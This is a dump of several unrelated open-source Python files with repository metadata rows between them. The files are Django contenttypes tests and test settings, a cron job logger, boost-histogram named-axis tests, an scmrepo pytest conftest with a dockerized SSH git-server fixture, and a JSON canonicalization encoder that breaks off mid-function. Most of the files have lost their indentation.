"""
with mock.patch('builtins.input', return_value='yes'):
with captured_stdout() as stdout:
call_command('remove_stale_contenttypes', verbosity=2)
self.assertIn("Deleting stale content type", stdout.getvalue())
self.assertEqual(ContentType.objects.count(), self.before_count)
def test_interactive_false(self):
"""
non-interactive mode of remove_stale_contenttypes shouldn't delete
stale content types.
"""
with captured_stdout() as stdout:
call_command('remove_stale_contenttypes', interactive=False, verbosity=2)
self.assertIn("Stale content types remain.", stdout.getvalue())
self.assertEqual(ContentType.objects.count(), self.before_count + 1)
def test_unavailable_content_type_model(self):
"""
A ContentType shouldn't be created if the model isn't available.
"""
apps = Apps()
with self.assertNumQueries(0):
contenttypes_management.create_contenttypes(self.app_config, interactive=False, verbosity=0, apps=apps)
self.assertEqual(ContentType.objects.count(), self.before_count + 1)
class TestRouter:
def db_for_read(self, model, **hints):
return 'other'
def db_for_write(self, model, **hints):
return 'default'
@override_settings(DATABASE_ROUTERS=[TestRouter()])
class ContentTypesMultidbTestCase(TestCase):
def setUp(self):
# Whenever a test starts executing, only the "default" database is
# connected. We explicitly connect to the "other" database here. If we
# don't do it, then it will be implicitly connected later when we query
# it, but in that case some database backends may automatically perform
# extra queries upon connecting (notably mysql executes
# "SET SQL_AUTO_IS_NULL = 0"), which will affect assertNumQueries().
connections['other'].ensure_connection()
def test_multidb(self):
"""
When using multiple databases, ContentType.objects.get_for_model() uses
db_for_read().
"""
ContentType.objects.clear_cache()
with self.assertNumQueries(0, using='default'), \
self.assertNumQueries(1, using='other'):
ContentType.objects.get_for_model(Author)
@override_settings(
MIGRATION_MODULES=dict(settings.MIGRATION_MODULES, contenttypes_tests='contenttypes_tests.operations_migrations'),
)
class ContentTypeOperationsTests(TransactionTestCase):
available_apps = [
'contenttypes_tests',
'django.contrib.contenttypes',
]
def setUp(self):
app_config = apps.get_app_config('contenttypes_tests')
models.signals.post_migrate.connect(self.assertOperationsInjected, sender=app_config)
def tearDown(self):
app_config = apps.get_app_config('contenttypes_tests')
models.signals.post_migrate.disconnect(self.assertOperationsInjected, sender=app_config)
def assertOperationsInjected(self, plan, **kwargs):
for migration, _backward in plan:
operations = iter(migration.operations)
for operation in operations:
if isinstance(operation, migrations.RenameModel):
next_operation = next(operations)
self.assertIsInstance(next_operation, contenttypes_management.RenameContentType)
self.assertEqual(next_operation.app_label, migration.app_label)
self.assertEqual(next_operation.old_model, operation.old_name_lower)
self.assertEqual(next_operation.new_model, operation.new_name_lower)
def test_existing_content_type_rename(self):
ContentType.objects.create(app_label='contenttypes_tests', model='foo')
management.call_command(
'migrate', 'contenttypes_tests', database='default', interactive=False, verbosity=0,
)
self.assertFalse(ContentType.objects.filter(app_label='contenttypes_tests', model='foo').exists())
self.assertTrue(ContentType.objects.filter(app_label='contenttypes_tests', model='renamedfoo').exists())
management.call_command(
'migrate', 'contenttypes_tests', 'zero', database='default', interactive=False, verbosity=0,
)
self.assertTrue(ContentType.objects.filter(app_label='contenttypes_tests', model='foo').exists())
self.assertFalse(ContentType.objects.filter(app_label='contenttypes_tests', model='renamedfoo').exists())
def test_missing_content_type_rename_ignore(self):
management.call_command(
'migrate', 'contenttypes_tests', database='default', interactive=False, verbosity=0,
)
self.assertFalse(ContentType.objects.filter(app_label='contenttypes_tests', model='foo').exists())
self.assertTrue(ContentType.objects.filter(app_label='contenttypes_tests', model='renamedfoo').exists())
management.call_command(
'migrate', 'contenttypes_tests', 'zero', database='default', interactive=False, verbosity=0,
)
self.assertTrue(ContentType.objects.filter(app_label='contenttypes_tests', model='foo').exists())
self.assertFalse(ContentType.objects.filter(app_label='contenttypes_tests', model='renamedfoo').exists())
def test_content_type_rename_conflict(self):
ContentType.objects.create(app_label='contenttypes_tests', model='foo')
ContentType.objects.create(app_label='contenttypes_tests', model='renamedfoo')
management.call_command(
'migrate', 'contenttypes_tests', database='default', interactive=False, verbosity=0,
)
self.assertTrue(ContentType.objects.filter(app_label='contenttypes_tests', model='foo').exists())
self.assertTrue(ContentType.objects.filter(app_label='contenttypes_tests', model='renamedfoo').exists())
management.call_command(
'migrate', 'contenttypes_tests', 'zero', database='default', interactive=False, verbosity=0,
)
self.assertTrue(ContentType.objects.filter(app_label='contenttypes_tests', model='foo').exists())
self.assertTrue(ContentType.objects.filter(app_label='contenttypes_tests', model='renamedfoo').exists())
| 42.960452
| 118
| 0.654392
|
794b1e6457a3dc6107c09a9441b4a2f56be9e62a
| 2,741
|
py
|
Python
|
bin/job_log.py
|
SlavomirMazurPantheon/sdo_analysis
|
777fed89dcc098fed5c539c37e5f44c2bfa80c0a
|
[
"Apache-2.0"
] | null | null | null |
bin/job_log.py
|
SlavomirMazurPantheon/sdo_analysis
|
777fed89dcc098fed5c539c37e5f44c2bfa80c0a
|
[
"Apache-2.0"
] | null | null | null |
bin/job_log.py
|
SlavomirMazurPantheon/sdo_analysis
|
777fed89dcc098fed5c539c37e5f44c2bfa80c0a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Copyright The IETF Trust 2020, All Rights Reserved
# This software is licensed to you under the terms of the Apache License, Version 2.0 (the 'License").
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
# The code, technical concepts, and all information contained herein, are the property of Cisco Technology, Inc.
# and/or its affiliated entities, under various laws including copyright, international treaties, patent,
# and/or contract. Any use of the material herein must be in accordance with the terms of the License.
# All rights not expressly granted by the License are reserved.
# Unless required by applicable law or agreed to separately in writing, software distributed under the
# License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied.
__author__ = 'Slavomir Mazur'
__copyright__ = 'Copyright The IETF Trust 2020, All Rights Reserved'
__license__ = 'Apache License, Version 2.0'
__email__ = 'slavomir.mazur@pantheon.tech'
import argparse
import json
from create_config import create_config
def job_log(start_time: int, end_time: int, temp_dir: str, filename: str, messages: list = [], status: str = ''):
result = {}
result['start'] = start_time
result['end'] = end_time
result['status'] = status
result['messages'] = messages
try:
with open('{}/cronjob.json'.format(temp_dir), 'r') as f:
file_content = json.load(f)
except:
file_content = {}
last_successfull = None
# If successfull rewrite, otherwise use last_successfull value from JSON
if status == 'Success':
last_successfull = end_time
else:
try:
previous_state = file_content.get(filename)
last_successfull = previous_state.get('last_successfull')
except:
last_successfull = None
result['last_successfull'] = last_successfull
file_content[filename] = result
with open('{}/cronjob.json'.format(temp_dir), 'w') as f:
f.write(json.dumps(file_content, indent=4))
if __name__ == '__main__':
config = create_config()
temp_dir = config.get('Directory-Section', 'temp')
parser = argparse.ArgumentParser()
parser.add_argument('--start', default=0, help='Cronjob start time', required=True)
parser.add_argument('--end', default=0, help='Cronjob end time', required=True)
parser.add_argument('--status', default='Fail', help='Result of cronjob run', required=True)
parser.add_argument('--filename', default='', help='Name of job', required=True)
args = parser.parse_args()
job_log(int(args.start), int(args.end), temp_dir, args.filename, status=args.status)
| 40.910448
| 113
| 0.707406
|
794b1ed353428ceaa551b4f159e11448a0f4c4ad
| 2,151
|
py
|
Python
|
server_guardian/tests/test_settings.py
|
bitmazk/django-server-guardian
|
1b6f642b8aa9abd03ef86f9879432cb0d0260375
|
[
"MIT"
] | null | null | null |
server_guardian/tests/test_settings.py
|
bitmazk/django-server-guardian
|
1b6f642b8aa9abd03ef86f9879432cb0d0260375
|
[
"MIT"
] | null | null | null |
server_guardian/tests/test_settings.py
|
bitmazk/django-server-guardian
|
1b6f642b8aa9abd03ef86f9879432cb0d0260375
|
[
"MIT"
] | null | null | null |
"""Settings that need to be set in order to run the tests."""
import os
DEBUG = True
SITE_ID = 1
APP_ROOT = os.path.abspath(
os.path.join(os.path.dirname(__file__), '..'))
DJANGO_PROJECT_ROOT = os.path.join(APP_ROOT, '..')
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
}
}
ROOT_URLCONF = 'server_guardian.tests.urls'
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(APP_ROOT, '../app_static')
MEDIA_ROOT = os.path.join(APP_ROOT, '../app_media')
STATICFILES_DIRS = (
os.path.join(APP_ROOT, 'static'),
)
TEMPLATES = [{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
'DIRS': [os.path.join(APP_ROOT, 'tests/test_app/templates')],
'OPTIONS': {
'context_processors': (
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.request',
)
}
}]
EXTERNAL_APPS = [
'django.contrib.admin',
'django.contrib.admindocs',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.staticfiles',
'django.contrib.sitemaps',
'django.contrib.sites',
]
INTERNAL_APPS = [
'server_guardian',
'server_guardian_api',
'server_guardian.tests.test_app',
]
SERVER_GUARDIAN_SECURITY_TOKEN = 'foobar'
LOGIN_URL = 'admin/login/'
LOCKFILE_FOLDER = os.path.join(APP_ROOT, '../lockfile')
INSTALLED_APPS = EXTERNAL_APPS + INTERNAL_APPS
MIDDLEWARE_CLASSES = [
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
SECRET_KEY = 'foobar'
FROM_EMAIL = 'foobar@example.com'
EMAIL_BACKEND = 'django.core.mail.backends.locmem.EmailBackend'
ADMINS = (
('Fooman Barster', 'fooman.barster@example.com'),
)
| 25.305882
| 69
| 0.69549
|
794b1f3af04769f5d19955cd302cb3af26a28a57
| 5,220
|
py
|
Python
|
tests/test_minihist_title.py
|
andrzejnovak/boost-histogram
|
cdbfabb1c22f5545bf3900be01f2025411e699f1
|
[
"BSD-3-Clause"
] | 105
|
2019-03-08T14:59:37.000Z
|
2022-03-11T12:46:17.000Z
|
tests/test_minihist_title.py
|
andrzejnovak/boost-histogram
|
cdbfabb1c22f5545bf3900be01f2025411e699f1
|
[
"BSD-3-Clause"
] | 400
|
2019-03-11T23:10:18.000Z
|
2022-03-25T14:02:06.000Z
|
tests/test_minihist_title.py
|
andrzejnovak/boost-histogram
|
cdbfabb1c22f5545bf3900be01f2025411e699f1
|
[
"BSD-3-Clause"
] | 25
|
2019-03-11T18:02:31.000Z
|
2022-03-10T20:14:22.000Z
|
# The point of this test is to make sure that the infrastructure for supporting
# custom attributes, like title in Hist, is working.
import pytest
import boost_histogram as bh
# First, make a new family to identify your library
CUSTOM_FAMILY = object()
# Add named axes
class NamedAxesTuple(bh.axis.AxesTuple):
    """AxesTuple subclass that also supports lookup of axes by their ``name``."""

    __slots__ = ()

    def _get_index_by_name(self, name):
        # Non-string keys (ints, None) pass through unchanged so ordinary
        # positional indexing and open slice bounds keep working.
        if not isinstance(name, str):
            return name
        for i, ax in enumerate(self):
            if ax.name == name:
                return i
        raise KeyError(f"{name} not found in axes")

    def __getitem__(self, item):
        # Translate string names (including names used inside a slice) to
        # integer positions, then defer to the base tuple indexing.
        if isinstance(item, slice):
            item = slice(
                self._get_index_by_name(item.start),
                self._get_index_by_name(item.stop),
                self._get_index_by_name(item.step),
            )
        else:
            item = self._get_index_by_name(item)
        return super().__getitem__(item)

    @property
    def name(self):
        """
        The names of the axes. May be empty strings.
        """
        return tuple(ax.name for ax in self)

    @name.setter
    def name(self, values):
        # Writes through to the underlying axis metadata; the "test: " prefix
        # lets the test suite observe that this setter (not another code path)
        # performed the write.
        for ax, val in zip(self, values):
            ax._ax.metadata["name"] = f"test: {val}"
# When you subclass Histogram or an Axes, you should register your family so
# boost-histogram will know what to convert C++ objects into.
class AxesMixin:
    """Mixin that adds a read-only ``name`` property backed by axis metadata."""

    __slots__ = ()

    # Only required for placing the Mixin first
    def __init_subclass__(cls, **kwargs):
        super().__init_subclass__(**kwargs)

    @property
    def name(self):
        """
        Get the name for the Regular axis
        """
        # Empty string when no name was ever stored in the metadata.
        return self._ax.metadata.get("name", "")
# The order of the mixin is important here - it must be first
# if it needs to override bh.axis.Regular, otherwise, last is simpler,
# as it doesn't need to forward __init_subclass__ kwargs then.
class Regular(bh.axis.Regular, AxesMixin, family=CUSTOM_FAMILY):
    """Regular axis that requires a ``name``, stored in the axis metadata."""

    __slots__ = ()

    def __init__(self, bins, start, stop, name):
        super().__init__(bins, start, stop)
        self._ax.metadata["name"] = name
class Integer(AxesMixin, bh.axis.Integer, family=CUSTOM_FAMILY):
    """Integer axis that requires a ``name``, stored in the axis metadata."""

    __slots__ = ()

    def __init__(self, start, stop, name):
        super().__init__(start, stop)
        self._ax.metadata["name"] = name
class CustomHist(bh.Histogram, family=CUSTOM_FAMILY):
    """Histogram whose axes can be looked up by name; non-empty names must be unique."""

    def _generate_axes_(self):
        # Hook used by boost-histogram to build the axes container.
        axes = (self._axis(i) for i in range(self.ndim))
        return NamedAxesTuple(axes)

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Reject duplicate non-empty axis names (empty names may repeat).
        seen = set()
        for ax in self.axes:
            label = ax.name
            if not label:
                continue
            if label in seen:
                msg = "{} instance cannot contain axes with duplicated names".format(
                    self.__class__.__name__
                )
                raise KeyError(msg)
            seen.add(label)
def test_hist_creation():
hist_1 = CustomHist(Regular(10, 0, 1, name="a"), Integer(0, 4, name="b"))
assert hist_1.axes[0].name == "a"
assert hist_1.axes[1].name == "b"
hist_2 = CustomHist(Regular(10, 0, 1, name=""), Regular(20, 0, 4, name=""))
assert hist_2.axes[0].name == ""
assert hist_2.axes[1].name == ""
with pytest.raises(KeyError):
CustomHist(Regular(10, 0, 1, name="a"), Regular(20, 0, 4, name="a"))
def test_hist_index():
hist_1 = CustomHist(Regular(10, 0, 1, name="a"), Regular(20, 0, 4, name="b"))
assert hist_1.axes[0].name == "a"
assert hist_1.axes[1].name == "b"
def test_hist_convert():
hist_1 = CustomHist(Regular(10, 0, 1, name="a"), Integer(0, 4, name="b"))
hist_bh = bh.Histogram(hist_1)
assert type(hist_bh.axes[0]) == bh.axis.Regular
assert type(hist_bh.axes[1]) == bh.axis.Integer
assert hist_bh.axes[0].name == "a"
assert hist_bh.axes[1].name == "b"
hist_2 = CustomHist(hist_bh)
assert type(hist_2.axes[0]) == Regular
assert type(hist_2.axes[1]) == Integer
assert hist_2.axes[0].name == "a"
assert hist_2.axes[1].name == "b"
# Just verify no-op status
hist_3 = CustomHist(hist_1)
assert type(hist_3.axes[0]) == Regular
assert type(hist_3.axes[1]) == Integer
assert hist_3.axes[0].name == "a"
assert hist_3.axes[1].name == "b"
def test_access():
hist = CustomHist(Regular(10, 0, 1, name="a"), Regular(20, 0, 4, name="b"))
assert hist.axes["a"] == hist.axes[0]
assert hist.axes["b"] == hist.axes[1]
from_bh = bh.Histogram(bh.axis.Regular(10, 0, 1), bh.axis.Regular(20, 0, 4))
from_bh.axes.name = "a", "b"
hist_conv = CustomHist(from_bh)
assert hist_conv.axes["a"] == hist_conv.axes[0]
assert hist_conv.axes["b"] == hist_conv.axes[1]
def test_hist_name_set():
hist_1 = CustomHist(Regular(10, 0, 1, name="a"), Regular(20, 0, 4, name="b"))
hist_1.axes.name = ("c", "d")
assert hist_1.axes.name == ("test: c", "test: d")
with pytest.raises(AttributeError):
hist_1.axes[0].name = "a"
hist_1.axes.label = ("one", "two")
assert hist_1.axes.label == ("one", "two")
with pytest.raises(ValueError):
hist_1.axes.label = ("one",)
with pytest.raises(ValueError):
hist_1.axes.label = ("one", "two", "three")
| 29.162011
| 81
| 0.61705
|
794b1f77e3d869b0a0e4610732fdf537233ff493
| 3,829
|
py
|
Python
|
tests/conftest.py
|
pmrowla/scmrepo
|
4f33b3558d802bfb0f33992f83e5d72cccf50c5b
|
[
"Apache-2.0"
] | 8
|
2021-11-26T05:45:20.000Z
|
2022-03-04T09:27:28.000Z
|
tests/conftest.py
|
pmrowla/scmrepo
|
4f33b3558d802bfb0f33992f83e5d72cccf50c5b
|
[
"Apache-2.0"
] | 24
|
2021-11-26T03:40:26.000Z
|
2022-03-29T04:11:09.000Z
|
tests/conftest.py
|
pmrowla/scmrepo
|
4f33b3558d802bfb0f33992f83e5d72cccf50c5b
|
[
"Apache-2.0"
] | 5
|
2021-12-06T02:50:57.000Z
|
2021-12-27T12:02:37.000Z
|
import asyncio
import os
import subprocess
import sys
from typing import Any, AsyncIterator, Dict, Iterator
import asyncssh
import pygit2
import pytest
from pytest_test_utils import TempDirFactory, TmpDir
from scmrepo.git import Git
TEST_SSH_USER = "user"
TEST_SSH_KEY_PATH = os.path.join(
os.path.abspath(os.path.dirname(__file__)), f"{TEST_SSH_USER}.key"
)
# pylint: disable=redefined-outer-name
def pytest_addoption(parser):
    """Register the ``--slow`` command line flag (off by default)."""
    parser.addoption(
        "--slow", action="store_true", default=False, help="run slow tests"
    )
def pytest_collection_modifyitems(config, items):
    """Mark ``slow``-tagged tests as skipped unless ``--slow`` was given."""
    if config.getoption("--slow"):
        # Slow tests were explicitly requested: collect everything unchanged.
        return
    marker = pytest.mark.skip(reason="need --slow option to run")
    slow_items = (item for item in items if "slow" in item.keywords)
    for item in slow_items:
        item.add_marker(marker)
@pytest.fixture(autouse=True)
def isolate(
    tmp_dir_factory: TempDirFactory, monkeypatch: pytest.MonkeyPatch
) -> None:
    """Redirect HOME (and git's config lookup) to a throwaway directory.

    Autouse: every test runs with an isolated ~/.gitconfig so the real user's
    git configuration is never read or modified.
    """
    path = tmp_dir_factory.mktemp("mock")
    home_dir = path / "home"
    home_dir.mkdir()
    if sys.platform == "win32":
        # Windows resolves the home dir from USERPROFILE / HOMEDRIVE+HOMEPATH.
        home_drive, home_path = os.path.splitdrive(home_dir)
        monkeypatch.setenv("USERPROFILE", str(home_dir))
        monkeypatch.setenv("HOMEDRIVE", home_drive)
        monkeypatch.setenv("HOMEPATH", home_path)
    else:
        monkeypatch.setenv("HOME", str(home_dir))
    # Also keep the system-level /etc/gitconfig out of the picture.
    monkeypatch.setenv("GIT_CONFIG_NOSYSTEM", "1")
    contents = b"""
[user]
name=DVC Tester
email=dvctester@example.com
[init]
defaultBranch=master
"""
    (home_dir / ".gitconfig").write_bytes(contents)
    # pygit2 resolves its global-config search path independently of $HOME,
    # so point it at the fake home explicitly.
    pygit2.settings.search_path[pygit2.GIT_CONFIG_LEVEL_GLOBAL] = str(home_dir)
@pytest.fixture
def scm(tmp_dir: TmpDir) -> Iterator[Git]:
    """Yield a fresh Git repository initialized in *tmp_dir*; closed afterwards."""
    git_ = Git.init(tmp_dir)
    sig = git_.pygit2.default_signature
    # Sanity-check that the isolated ~/.gitconfig (see `isolate`) is in effect.
    assert sig.email == "dvctester@example.com"
    assert sig.name == "DVC Tester"
    yield git_
    git_.close()
@pytest.fixture(scope="session")
def docker(request: pytest.FixtureRequest):
    """Session-scoped pytest-docker services, skipping when docker is unusable."""
    # Probe both the docker daemon and docker-compose; skip (not fail) when
    # either is missing or not responding.
    for cmd in [("docker", "ps"), ("docker-compose", "version")]:
        try:
            subprocess.check_call(
                cmd,
                stderr=subprocess.DEVNULL,
                stdout=subprocess.DEVNULL,
            )
        except (subprocess.CalledProcessError, OSError):
            pytest.skip(f"no {cmd[0]} installed")
    if "CI" in os.environ and os.name == "nt":
        pytest.skip("disabled for Windows on Github Actions")
    pytest.importorskip("pytest_docker")
    # Resolve the plugin fixture lazily so the import-skip above runs first.
    yield request.getfixturevalue("docker_services")
@pytest.fixture
def ssh_conn_info(
    docker,  # pylint: disable=unused-argument
) -> Dict[str, Any]:
    """Connection kwargs for the dockerized git-over-SSH test server.

    Blocks (up to 30s) until the server answers both an SSH exec request and
    an SFTP request, then returns the kwargs for ``asyncssh.connect``.
    """
    conn_info = {
        "host": "127.0.0.1",
        "port": docker.port_for("git-server", 2222),
        "client_keys": TEST_SSH_KEY_PATH,
        # Host-key verification is disabled for the throwaway test container.
        "known_hosts": None,
        "username": TEST_SSH_USER,
    }

    async def _check() -> bool:
        # Readiness probe: git usable over exec AND the SFTP subsystem up.
        try:
            async with asyncssh.connect(**conn_info) as conn:
                result = await conn.run("git --version")
                assert result.returncode == 0
                async with conn.start_sftp_client() as sftp:
                    assert await sftp.exists("/")
        except Exception:  # pylint: disable=broad-except
            # Any failure just means "not ready yet" for the retry loop.
            return False
        return True

    def check() -> bool:
        return asyncio.run(_check())

    docker.wait_until_responsive(timeout=30.0, pause=1, check=check)
    return conn_info
@pytest.fixture
async def ssh_connection(
    ssh_conn_info: Dict[str, Any],
) -> AsyncIterator[asyncssh.connection.SSHClientConnection]:
    """Yield an open SSH connection to the test server; closed on teardown."""
    async with asyncssh.connect(**ssh_conn_info) as conn:
        yield conn
@pytest.fixture
async def sftp(
    ssh_connection: asyncssh.connection.SSHClientConnection,
) -> AsyncIterator[asyncssh.SFTPClient]:
    """Yield an SFTP client on top of the shared SSH connection."""
    async with ssh_connection.start_sftp_client() as sftp:
        yield sftp
| 27.35
| 79
| 0.662575
|
794b1fc41d299cc1fb99325307ba687caf8a73c2
| 18,441
|
py
|
Python
|
apifetch/jsonc/Canonicalize.py
|
matrey/apifetch
|
c32e6b00dd18e8b00948f4b7eef390bdb621e62d
|
[
"Apache-2.0"
] | null | null | null |
apifetch/jsonc/Canonicalize.py
|
matrey/apifetch
|
c32e6b00dd18e8b00948f4b7eef390bdb621e62d
|
[
"Apache-2.0"
] | null | null | null |
apifetch/jsonc/Canonicalize.py
|
matrey/apifetch
|
c32e6b00dd18e8b00948f4b7eef390bdb621e62d
|
[
"Apache-2.0"
] | null | null | null |
# From https://raw.githubusercontent.com/cyberphone/json-canonicalization/472e9e142de304b5b7c4be0fec6016fbe3531098/python3/src/org/webpki/json/Canonicalize.py
##############################################################################
# #
# Copyright 2006-2019 WebPKI.org (http://webpki.org). #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# https://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
# #
##############################################################################
#################################################
# JCS compatible JSON serializer for Python 3.x #
#################################################
import re
from .NumberToJson import convert2Es6Format
try:
from _json import encode_basestring_ascii as c_encode_basestring_ascii
except ImportError:
c_encode_basestring_ascii = None # type: ignore
try:
from _json import encode_basestring as c_encode_basestring # type: ignore
except ImportError:
c_encode_basestring = None
try:
from _json import make_encoder as c_make_encoder
except ImportError:
c_make_encoder = None # type: ignore
# Characters that must be escaped inside a JSON string: C0 controls, the
# backslash, and the double quote.
ESCAPE = re.compile(r'[\x00-\x1f\\"\b\f\n\r\t]')
# Same, but additionally everything outside printable ASCII (for
# ensure_ascii output).
ESCAPE_ASCII = re.compile(r'([\\"]|[^\ -~])')
HAS_UTF8 = re.compile(b"[\x80-\xff]")
# Fixed two-character escapes; every remaining C0 control falls back to the
# generic \u00XX form (filled in by the loop below).
ESCAPE_DCT = {
    "\\": "\\\\",
    '"': '\\"',
    "\b": "\\b",
    "\f": "\\f",
    "\n": "\\n",
    "\r": "\\r",
    "\t": "\\t",
}
for i in range(0x20):
    ESCAPE_DCT.setdefault(chr(i), "\\u{0:04x}".format(i))
INFINITY = float("inf")
def py_encode_basestring(s):
    """Return a JSON representation of a Python string."""
    # Replace every character that needs escaping via the precomputed table,
    # then wrap the result in double quotes.
    escaped = ESCAPE.sub(lambda m: ESCAPE_DCT[m.group(0)], s)
    return '"' + escaped + '"'
encode_basestring = c_encode_basestring or py_encode_basestring
def py_encode_basestring_ascii(s):
    """Return an ASCII-only JSON representation of a Python string."""

    def escape_char(match):
        ch = match.group(0)
        mapped = ESCAPE_DCT.get(ch)
        if mapped is not None:
            # One of the fixed short escapes (\n, \", \\ ...).
            return mapped
        code = ord(ch)
        if code < 0x10000:
            return "\\u{0:04x}".format(code)
        # Characters beyond the BMP are emitted as a UTF-16 surrogate pair.
        code -= 0x10000
        high = 0xD800 | ((code >> 10) & 0x3FF)
        low = 0xDC00 | (code & 0x3FF)
        return "\\u{0:04x}\\u{1:04x}".format(high, low)

    return '"' + ESCAPE_ASCII.sub(escape_char, s) + '"'
encode_basestring_ascii = c_encode_basestring_ascii or py_encode_basestring_ascii
class JSONEncoder(object):
"""Extensible JSON <http://json.org> encoder for Python data structures.
Supports the following objects and types by default:
+-------------------+---------------+
| Python | JSON |
+===================+===============+
| dict | object |
+-------------------+---------------+
| list, tuple | array |
+-------------------+---------------+
| str | string |
+-------------------+---------------+
| int, float | number |
+-------------------+---------------+
| True | true |
+-------------------+---------------+
| False | false |
+-------------------+---------------+
| None | null |
+-------------------+---------------+
To extend this to recognize other objects, subclass and implement a
``.default()`` method with another method that returns a serializable
object for ``o`` if possible, otherwise it should call the superclass
implementation (to raise ``TypeError``).
"""
item_separator = ", "
key_separator = ": "
def __init__(
self,
*,
skipkeys=False,
ensure_ascii=False,
check_circular=True,
allow_nan=True,
sort_keys=True,
indent=None,
separators=(",", ":"),
default=None
):
"""Constructor for JSONEncoder, with sensible defaults.
If skipkeys is false, then it is a TypeError to attempt
encoding of keys that are not str, int, float or None. If
skipkeys is True, such items are simply skipped.
If ensure_ascii is true, the output is guaranteed to be str
objects with all incoming non-ASCII characters escaped. If
ensure_ascii is false, the output can contain non-ASCII characters.
If check_circular is true, then lists, dicts, and custom encoded
objects will be checked for circular references during encoding to
prevent an infinite recursion (which would cause an OverflowError).
Otherwise, no such check takes place.
If allow_nan is true, then NaN, Infinity, and -Infinity will be
encoded as such. This behavior is not JSON specification compliant,
but is consistent with most JavaScript based encoders and decoders.
Otherwise, it will be a ValueError to encode such floats.
If sort_keys is true, then the output of dictionaries will be
sorted by key; this is useful for regression tests to ensure
that JSON serializations can be compared on a day-to-day basis.
If indent is a non-negative integer, then JSON array
elements and object members will be pretty-printed with that
indent level. An indent level of 0 will only insert newlines.
None is the most compact representation.
If specified, separators should be an (item_separator, key_separator)
tuple. The default is (', ', ': ') if *indent* is ``None`` and
(',', ': ') otherwise. To get the most compact JSON representation,
you should specify (',', ':') to eliminate whitespace.
If specified, default is a function that gets called for objects
that can't otherwise be serialized. It should return a JSON encodable
version of the object or raise a ``TypeError``.
"""
self.skipkeys = skipkeys
self.ensure_ascii = ensure_ascii
self.check_circular = check_circular
self.allow_nan = allow_nan
self.sort_keys = sort_keys
self.indent = indent
if separators is not None:
self.item_separator, self.key_separator = separators
elif indent is not None:
self.item_separator = ","
if default is not None:
self.default = default
def default(self, o):
"""Implement this method in a subclass such that it returns
a serializable object for ``o``, or calls the base implementation
(to raise a ``TypeError``).
For example, to support arbitrary iterators, you could
implement default like this::
def default(self, o):
try:
iterable = iter(o)
except TypeError:
pass
else:
return list(iterable)
# Let the base class default method raise the TypeError
return JSONEncoder.default(self, o)
"""
raise TypeError(
"Object of type '%s' is not JSON serializable" % o.__class__.__name__
)
def encode(self, o):
"""Return a JSON string representation of a Python data structure.
>>> from json.encoder import JSONEncoder
>>> JSONEncoder().encode({"foo": ["bar", "baz"]})
'{"foo": ["bar", "baz"]}'
"""
# This is for extremely simple cases and benchmarks.
if isinstance(o, str):
if self.ensure_ascii:
return encode_basestring_ascii(o)
else:
return encode_basestring(o)
# This doesn't pass the iterator directly to ''.join() because the
# exceptions aren't as detailed. The list call should be roughly
# equivalent to the PySequence_Fast that ''.join() would do.
chunks = self.iterencode(o, _one_shot=False)
if not isinstance(chunks, (list, tuple)):
chunks = list(chunks)
return "".join(chunks)
def iterencode(self, o, _one_shot=False):
"""Encode the given object and yield each string
representation as available.
For example::
for chunk in JSONEncoder().iterencode(bigobject):
mysocket.write(chunk)
"""
if self.check_circular:
markers = {}
else:
markers = None
if self.ensure_ascii:
_encoder = encode_basestring_ascii
else:
_encoder = encode_basestring
def floatstr(
o,
allow_nan=self.allow_nan,
_repr=float.__repr__,
_inf=INFINITY,
_neginf=-INFINITY,
):
# Check for specials. Note that this type of test is processor
# and/or platform-specific, so do tests which don't depend on the
# internals.
if o != o:
text = "NaN"
elif o == _inf:
text = "Infinity"
elif o == _neginf:
text = "-Infinity"
else:
return _repr(o)
if not allow_nan:
raise ValueError(
"Out of range float values are not JSON compliant: " + repr(o)
)
return text
if _one_shot and c_make_encoder is not None and self.indent is None:
_iterencode = c_make_encoder(
markers,
self.default,
_encoder,
self.indent,
self.key_separator,
self.item_separator,
self.sort_keys,
self.skipkeys,
self.allow_nan,
)
else:
_iterencode = _make_iterencode(
markers,
self.default,
_encoder,
self.indent,
floatstr,
self.key_separator,
self.item_separator,
self.sort_keys,
self.skipkeys,
_one_shot,
)
return _iterencode(o, 0)
def _make_iterencode(
markers,
_default,
_encoder,
_indent,
_floatstr,
_key_separator,
_item_separator,
_sort_keys,
_skipkeys,
_one_shot,
## HACK: hand-optimized bytecode; turn globals into locals
ValueError=ValueError,
dict=dict,
float=float,
id=id,
int=int,
isinstance=isinstance,
list=list,
str=str,
tuple=tuple,
_intstr=int.__str__,
):
if _indent is not None and not isinstance(_indent, str):
_indent = " " * _indent
def _iterencode_list(lst, _current_indent_level):
if not lst:
yield "[]"
return
if markers is not None:
markerid = id(lst)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = lst
buf = "["
if _indent is not None:
_current_indent_level += 1
newline_indent = "\n" + _indent * _current_indent_level
separator = _item_separator + newline_indent
buf += newline_indent
else:
newline_indent = None
separator = _item_separator
first = True
for value in lst:
if first:
first = False
else:
buf = separator
if isinstance(value, str):
yield buf + _encoder(value)
elif value is None:
yield buf + "null"
elif value is True:
yield buf + "true"
elif value is False:
yield buf + "false"
elif isinstance(value, int):
